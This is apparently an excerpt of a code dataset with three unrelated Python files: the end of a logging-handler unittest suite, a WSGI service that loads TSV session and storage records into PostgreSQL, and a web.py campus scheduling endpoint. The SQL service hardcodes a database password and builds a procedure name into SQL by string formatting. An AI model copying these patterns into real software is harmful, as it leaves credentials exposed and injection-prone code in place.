        parsed_config = self._get_parsed_config("full_config.yml")
        parsed_web_logger = parsed_config.loggers[2]
        message = "test"
        name = parsed_config.name

        parsed_web_logger.emit(
            LogRecord(
                name=None,
                level=logging.ERROR,
                pathname=None,
                lineno=None,
                msg=message,
                args=None,
                exc_info=None,
            )
        )

        # headers and URL are updated (GET sends no body)
        mock_get.assert_called_once_with(
            auth=ANY,
            headers={
                "Content-Type": "application/json",
                "TestHeader3": f"{name} {message}",
            },
            url=f"https://some/url3?name={name}&message={message}",
        )

    @unittest.mock.patch("os.mkdir")
    def test_file_sizes_parser(self, mkdir):
        """
        Test file sizes parser (B / KB / MB / GB suffixes).
        """
        # logger index -> expected maxBytes
        id_file_size = {
            2: 1,
            3: 1 * 1024,
            4: 1 * 1024 * 1024,
            5: 1 * 1024 * 1024 * 1024,
        }

        # parse config and get first logger
        parsed_config = self._get_parsed_config("file_loggers_config.yml")

        # make sure the log directory was created
        mkdir.assert_called_with("/folder")

        # NOTE(review): was a list comprehension executed only for its
        # assertEqual side effects; a plain loop states the intent.
        for k, v in id_file_size.items():
            self.assertEqual(v, parsed_config.loggers[k].maxBytes)

    def __compare_file_loggers(
        self, first: handlers.RotatingFileHandler, second: handlers.RotatingFileHandler
    ) -> Tuple[bool, Optional[str]]:
        """
        Helper function to compare two handlers.RotatingFileHandler instances.

        Returns (True, None) on a match, otherwise (False, <field name>).
        """
        # BUG FIX: the original tested `not (second, handlers.RotatingFileHandler)`,
        # a 2-tuple that is always truthy, so `second`'s type was never checked.
        if not isinstance(first, handlers.RotatingFileHandler) or not isinstance(
            second, handlers.RotatingFileHandler
        ):
            return False, "class instance"
        if first.baseFilename != second.baseFilename:
            return False, "filename"
        if first.maxBytes != second.maxBytes:
            return False, "maxBytes"
        if first.backupCount != second.backupCount:
            return False, "backupCount"
        if first.formatter._fmt != second.formatter._fmt:
            return False, "formatter"
        if first.level != second.level:
            return False, "level"
        if len(first.filters) != len(second.filters):
            return False, "filters"
        for x, y in zip(first.filters, second.filters):
            if x != y:
                return False, "filters items"
        return True, None

    def __create_file_logger(
        self,
        filename: str,
        format: str,
        max_bytes: int = 1048576,
        backup_count: int = 0,
        min_level: int = logging.DEBUG,
        max_level: int = logging.CRITICAL,
    ) -> handlers.RotatingFileHandler:
        """Build the expected RotatingFileHandler without touching the disk."""
        # patch open() so instantiating the handler does not create the file
        with mock.patch("builtins.open", create=True):
            handler = handlers.RotatingFileHandler(
                filename=filename, maxBytes=max_bytes, backupCount=backup_count
            )
            handler.setFormatter(logging.Formatter(fmt=format))
            handler.setLevel(min_level)
            handler.addFilter(MaxLevelFilter(max_level))
            return handler

    def __create_web_handler(
        self,
        method: str,
        url: str,
        headers: Optional[Dict[str, str]] = None,
        body: Optional[str] = None,
        auth: Optional[Dict[str, str]] = None,
        min_level: int = logging.DEBUG,
        max_level: int = logging.CRITICAL,
    ) -> WebHandler:
        """Build the expected WebHandler with the given level window."""
        web = WebHandler(method, url, headers, body, auth)
        web.setLevel(min_level)
        web.addFilter(MaxLevelFilter(max_level))
        return web
if __name__ == "__main__":
unittest.main()
|
21,598 | 80e54a094fbd093a323dbc6dc9b0f18c84ffd813 | #!/usr/bin/env python3
# gunicorn3 -t 120 -b 127.0.0.1:8000 --reload myapp:app
# curl -v --data-binary "@data.txt" http://127.0.0.1:80/sess_start_tsv
# 1.119.142.196 SRR1972739 linux64 sra-toolkit fastq-dump.2.8.2 sra-download.ncbi.nlm.nih.gov 200 1539891273.321 1538981273.432 0 2\n
import sys
import ipaddress
import traceback
from io import BytesIO
import datetime
import psycopg2
def app(environ, start_response):
    """
    WSGI entry point: dispatch POSTed TSV payloads to the matching handler.

    Known paths:
      /sess_start_tsv -- session-start records (uses the add_session proc)
      /storage_tsv    -- storage usage records

    NOTE(review): any other path falls off the end of the try and returns
    None, which is not a valid WSGI response -- confirm unknown paths
    cannot reach this app, or add an explicit 404 branch.
    """
    output = BytesIO()
    try:
        if environ["PATH_INFO"] == "/sess_start_tsv":
            sess_start_tsv(environ, "add_session", start_response, output)
            return [output.getvalue()]
        elif environ["PATH_INFO"] == "/storage_tsv":
            storage_tsv(environ, start_response, output)
            return [output.getvalue()]
    except Exception:  # BUG FIX: was a bare except (also trapped SystemExit/KeyboardInterrupt)
        headers = [("content-type", "text/plain")]
        start_response("500 oops", headers, sys.exc_info())
        print(sys.exc_info(), file=sys.stderr)
        # BUG FIX: the original `print(traceback.print_tb(...))` printed the
        # traceback to stdout and then printed "None"; emit it on stderr.
        traceback.print_exc(file=sys.stderr)
        return [b"exception"]
def storage_tsv(environ, start_response, output):
    """
    Handle POST /storage_tsv: parse tab-separated storage records and insert
    each one via the `add_storage` stored procedure.

    Expected columns per line:
      0 epoch-seconds timestamp, 1 byte count, 2 bucket, 3 source
    """
    headers = [("Content-Type", "text/plain")]
    if environ["REQUEST_METHOD"].upper() != "POST":
        output.write(b"Only POST supported\n")
        dump_headers(environ, start_response, output)
        return
    start_response("200 OK", headers)
    output.write(b"\nOutput\n------\n")

    request_len = int(environ.get("CONTENT_LENGTH", 0))
    output.write(b"Got %d input bytes\n" % request_len)
    wsgi_input = environ["wsgi.input"]

    count = 0
    try:
        db = psycopg2.connect(
            "dbname='grafana' user='grafana' host='localhost' password='grafana'"
        )
        curs = db.cursor()
    except Exception as e:
        # BUG FIX: the original fell through after a failed connect and then
        # crashed with NameError on `curs`; bail out instead.
        print("can't connect to the database: " + str(e))
        return

    r = wsgi_input.read()
    lines = r.split(b"\n")
    output.write(b"Got %d lines\n" % len(lines))
    for line in lines:
        # (removed dead `if line is None: break` guard -- bytes.split()
        # never yields None)
        cols = line.split(b"\t")
        if len(cols) < 4:
            output.write(b"Short line:" + line)
            continue
        count += 1
        try:
            start = datetime.datetime.utcfromtimestamp(float(cols[0]))
            bytecount = int(cols[1])
            bucket = cols[2].decode()
            source = cols[3].decode()
        except Exception as e:
            # BUG FIX: on a conversion error the original fell through and
            # inserted stale values from the previous row; skip the line.
            print("can't convert row:" + str(e) + ":" + repr(cols))
            continue
        try:
            # parameterized call -- values are bound, not interpolated
            curs.execute(
                "select add_storage ( "
                + """
                %s::text,
                %s::timestamp,
                %s::bigint,
                %s::text)""",
                (bucket, start, bytecount, source),
            )
        except Exception as e:
            db.rollback()
            print("can't insert storage:" + str(e))
        # NOTE(review): per-row commit inferred from the per-row rollback
        # above; the original indentation was lost -- confirm placement.
        db.commit()
    output.write(b"called stored procedure %d times\n" % count)
    print(f"called stored procedure {count} times\n")
    # curs.execute('ANALYZE')
    # curs.execute("CLUSTER")
    return
def sess_start_tsv(environ, proc, start_response, output):
    """
    Handle POST /sess_start_tsv: parse tab-separated session records and
    insert each one via the stored procedure named by `proc`.

    Expected columns per line:
      0 ip, 1 accession, 2 user agent, 3 result code, 4 domain,
      5 start epoch, 6 end epoch, 7 byte count, 8 count,
      9 (optional) source -- defaults to "sra prod"
    """
    headers = [("Content-Type", "text/plain")]
    if environ["REQUEST_METHOD"].upper() != "POST":
        output.write(b"Only POST supported\n")
        dump_headers(environ, start_response, output)
        return
    start_response("200 OK", headers)
    output.write(b"\nOutput\n------\n")

    request_len = int(environ.get("CONTENT_LENGTH", 0))
    output.write(b"Got %d input bytes\n" % request_len)
    wsgi_input = environ["wsgi.input"]

    count = 0
    try:
        db = psycopg2.connect(
            "dbname='grafana' user='grafana' host='localhost' password='grafana'"
        )
        curs = db.cursor()
    except Exception as e:
        # BUG FIX: the original fell through after a failed connect and then
        # crashed with NameError on `curs`; bail out instead.
        print("can't connect to the database: " + str(e))
        return

    r = wsgi_input.read()
    lines = r.split(b"\n")
    output.write(b"Got %d lines\n" % len(lines))
    for line in lines:
        # (removed dead `if line is None: break` guard -- bytes.split()
        # never yields None)
        cols = line.split(b"\t")
        if len(cols) < 9:
            output.write(b"Short line:" + line)
            continue
        count += 1
        # column 9 (source) is optional
        if len(cols) == 9:
            source = "sra prod"
        else:
            source = cols[9].decode()
        try:
            ip = cols[0].decode()
            acc = cols[1].decode()
            agent = cols[2].decode()
            res = int(cols[3])
            domain = cols[4].decode()
            start = datetime.datetime.utcfromtimestamp(float(cols[5]))
            end = datetime.datetime.utcfromtimestamp(float(cols[6]))
            bytecount = int(cols[7])
            cnt = int(cols[8])
        except Exception as e:
            # BUG FIX: on a conversion error the original fell through and
            # inserted stale values from the previous row; skip the line.
            print("can't convert row:" + str(e) + ":" + repr(cols))
            continue
        # store the IP both as text and as an integer for range queries
        if ":" in ip:
            ipint = int(ipaddress.IPv6Address(ip))
        else:
            ipint = int(ipaddress.IPv4Address(ip))
        try:
            # Don't care if a few records are lost during server crash, DB will
            # not be corrupted.
            curs.execute("SET synchronous_commit = off")
            # NOTE(review): `proc` is interpolated into the SQL string; only
            # the literal "add_session" is passed today -- never feed it
            # user-controlled input.  Row values are properly parameterized.
            curs.execute(
                "select %s ( " % proc
                + """
                %s::text,
                %s::decimal(39,0),
                %s::text,
                %s::text,
                %s::text,
                %s::integer,
                %s::timestamp,
                %s::timestamp,
                %s::bigint,
                %s::integer,
                %s::text)""",
                (
                    ip,
                    ipint,
                    acc,
                    agent,
                    domain,
                    res,
                    start,
                    end,
                    bytecount,
                    cnt,
                    source,
                ),
            )
        except Exception as e:
            db.rollback()
            print("can't insert %s %s %s" % (proc, start, str(e)))
            print("bad line was " + repr(line))
        # NOTE(review): per-row commit inferred from the per-row rollback
        # above; the original indentation was lost -- confirm placement.
        db.commit()
    output.write(b"called stored procedure %d times\n" % count)
    print("called stored procedure %d times\n" % count)
    # curs.execute('ANALYZE')
    # curs.execute("CLUSTER")
def dump_headers(environ, start_response, output):
    """
    Debug helper: respond "500 Bad" and echo every WSGI environ entry plus
    the raw request body lines into `output`.

    NOTE: consumes environ["wsgi.input"]; callers must not need the body
    afterwards.
    """
    headers = [("Content-Type", "text/plain")]
    start_response("500 Bad", headers)
    # dump every environ key/value, one per line
    for key in environ.keys():
        x = "%s: %s\n" % (key, repr(environ[key]))
        output.write(x.encode())
    output.write(b"\n")
    # echo the raw request body back
    wsgi_input = environ["wsgi.input"]
    lines = wsgi_input.readlines()
    output.write(b"Got %d lines\n" % len(lines))
    output.write(b"\n".join(lines))
    return
|
21,599 | 06a0cfce8bd3dcf579ab0f221debb142315d3a35 | #!/usr/bin/python
# -*- coding: utf8 -*-
"""
author:nango
update_time: 2015/7/23--12:05
apis:
/campus/batch/segment/list
"""
import route
import web
import random
import time
from database import *
from output import *
from encrypt import *
@route.route('/campus/batch/segment/list')
class CampusBatchSegmentListGet:
    """List a campus's batch time segments, ordered by begin/end time."""

    def POST(self):
        # BUG FIX: the default kwarg was spelled `accesstoken` while the code
        # reads `input.access_token`, so a request missing the parameter
        # raised AttributeError instead of returning error 118.
        input = web.input(access_token='')
        # missing required parameter
        if input.access_token == '':
            return output(118)
        db = getDb()
        # resolve the token to a campus
        results = db.select('campus_token', vars={'token': input.access_token},
                            where='access_token=$token', what="campus_id", order="campus_id desc")
        if len(results) > 0:
            try:
                # get the campus id
                campus_id = results[0].campus_id
                # query batch_segment and sort by begin/end time
                results = db.select('batch_segment', vars={'campus_id': campus_id},
                                    where='campus_id=$campus_id',
                                    order="begin_hour,begin_min,begin_second,end_hour,end_min,end_second asc")
                data = []
                for i in results:
                    data.append(GetTimeStr.getTimeStr(i.begin_hour, i.begin_min, i.end_hour, i.end_min))
                data1 = []
                indext = 1
                for i in data:
                    # NOTE(review): "bacth_string" is a typo but also part of
                    # the wire format clients may depend on -- left unchanged.
                    data1.append({"batch_number": indext, "bacth_string": i})
                    indext = indext + 1
                return output(200, data1)
            except Exception:  # narrowed from bare except
                return output(700)
        else:
            # token not recognised: insufficient permission
            return output(420)
class GetTimeStr:
    """Helpers to format (hour, minute) pairs as "HH:MM-HH:MM" strings."""

    @staticmethod
    def getStr(number=0):
        """Return `number` as a zero-padded, two-character string."""
        if number < 10:
            return "0" + str(number)
        return str(number)

    @staticmethod
    def getTimeStr(begin_hour=0, begin_min=0, end_hour=0, end_min=0):
        """Format a time range as "HH:MM-HH:MM"."""
        begin_hour = GetTimeStr.getStr(begin_hour)
        begin_min = GetTimeStr.getStr(begin_min)
        end_hour = GetTimeStr.getStr(end_hour)
        end_min = GetTimeStr.getStr(end_min)
        # BUG FIX: removed the stray Python-2 debug `print` statement that
        # echoed every formatted segment to stdout on each API call.
        return begin_hour + ":" + begin_min + "-" + end_hour + ":" + end_min
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.